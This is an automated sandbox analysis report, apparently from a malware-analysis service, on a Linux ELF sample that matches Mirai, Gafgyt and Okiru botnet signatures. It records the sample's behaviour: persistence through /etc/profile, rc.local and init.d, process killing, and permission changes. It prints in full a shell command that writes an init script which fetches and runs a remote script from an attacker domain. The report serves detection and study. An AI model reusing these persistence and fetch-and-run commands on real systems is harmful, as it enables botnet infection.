Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown	TCP traffic detected without corresponding DNS query: 45.202.35.64

Source: global traffic

DNS traffic detected: DNS query: daisy.ubuntu.com

Source: x86_32.nn.elf, 5461.1.00000000ffaf4000.00000000ffb15000.rw-.sdmp, x86_32.nn.elf.32.dr, profile.12.dr, inittab.12.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.dr	String found in binary or memory: http://pen.gorillafirewall.su/
Source: x86_32.nn.elf, 5461.1.00000000ffaf4000.00000000ffb15000.rw-.sdmp	String found in binary or memory: http://pen.gorillafirewall.su/lol.sh

System Summary

Malicious sample detected (through community Yara rule)

Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: Found And Killed Process: PID=%d, Realpath=%s/snap/snapd/15534/usr/lib/snapd/snapd/usr/libexec/openssh/sftp-serveranko-app/ankosample _8182T_11047815351681972surf2/proc/self/exe/proc/%s/exe/.(deleted)socket/tmp/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnetbashhttpdtelnetddropbearencodersystem/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt487154914:1553<41<515791446<614561;814994;8153;148;14<5which gdb > /dev/nu

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Sample tries to kill a process (SIGKILL)

Source: /tmp/x86_32.nn.elf (PID: 5462)	SIGKILL sent: pid: 792, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5462)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5462)	SIGKILL sent: pid: 1944, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5462)	SIGKILL sent: pid: 3181, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5462)	SIGKILL sent: pid: 3185, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5462)	SIGKILL sent: pid: 5469, result: successful	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5462)	SIGKILL sent: pid: 5483, result: successful	Jump to behavior

Yara signature match

Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26

Source: classification engine

Classification label: mal88.spre.troj.evad.linELF@0/9@2/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/x86_32.nn.elf (PID: 5461)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/x86_32.nn.elf (PID: 5461)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 5474)	File: /etc/rcS.d/S99mybinary -> /etc/init.d/mybinary	Jump to behavior
Source: /usr/bin/ln (PID: 5481)	File: /etc/rc.d/S99x86_32.nn.elf -> /etc/init.d/x86_32.nn.elf	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/x86_32.nn.elf (PID: 5461)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5472)	File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5477)	File: /etc/init.d/x86_32.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Executes commands using a shell command-line interpreter

Source: /tmp/x86_32.nn.elf (PID: 5463)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5468)	Shell command executed: sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5473)	Shell command executed: sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5475)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/x86_32.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting x86_32.nn.elf'\n /tmp/x86_32.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping x86_32.nn.elf'\n killall x86_32.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/x86_32.nn.elf"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5476)	Shell command executed: sh -c "chmod +x /etc/init.d/x86_32.nn.elf >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5478)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 5480)	Shell command executed: sh -c "ln -s /etc/init.d/x86_32.nn.elf /etc/rc.d/S99x86_32.nn.elf >/dev/null 2>&1"	Jump to behavior

Executes the "chmod" command used to modify permissions

Source: /bin/sh (PID: 5472)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mybinary			Jump to behavior
Source: /bin/sh (PID: 5477)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/x86_32.nn.elf			Jump to behavior

Executes the "mkdir" command used to create folders

Source: /bin/sh (PID: 5479)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Executes the "systemctl" command used for controlling the systemd system and service manager

Source: /bin/sh (PID: 5464)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Sample tries to set the executable flag

Source: /tmp/x86_32.nn.elf (PID: 5461)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5472)	File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5477)	File: /etc/init.d/x86_32.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Writes shell script file to disk with an unusual file extension

Source: /tmp/x86_32.nn.elf (PID: 5461)	Writes shell script file to disk with an unusual file extension: /etc/init.d/mybinary	Jump to dropped file
Source: /tmp/x86_32.nn.elf (PID: 5461)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 5475)	Writes shell script file to disk with an unusual file extension: /etc/init.d/x86_32.nn.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/x86_32.nn.elf (PID: 5461)	File: /etc/init.d/mybinary			Jump to dropped file
Source: /bin/sh (PID: 5475)	File: /etc/init.d/x86_32.nn.elf			Jump to dropped file

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: x86_32.nn.elf, type: SAMPLE
Source: Yara match	File source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 5461, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: x86_32.nn.elf, type: SAMPLE
Source: Yara match	File source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 5461, type: MEMORYSTR

ID:	1522875
Product:	CloudBasic
Start time:	19:28:37
Start date:	30.09.2024
Sample:	x86_32.nn.elf
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	cda42956d6213c465b6876502ce3cfa6
SHA1:	cdd2d1950ddd18b78b8f9c78c777e04eabc9ef6a
SHA256:	d99d10559f1ad6bba1b59913604e261a613daa94af01ade8276effd692b5c03f
Filetype:	ELF Executable and Linkable format (Linux) (4029/14) 50.16%

Linux Analysis Report x86_32.nn.elf

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Network Map

Contacted Public IPs

Contacted Domains

Linux Analysis Report
x86_32.nn.elf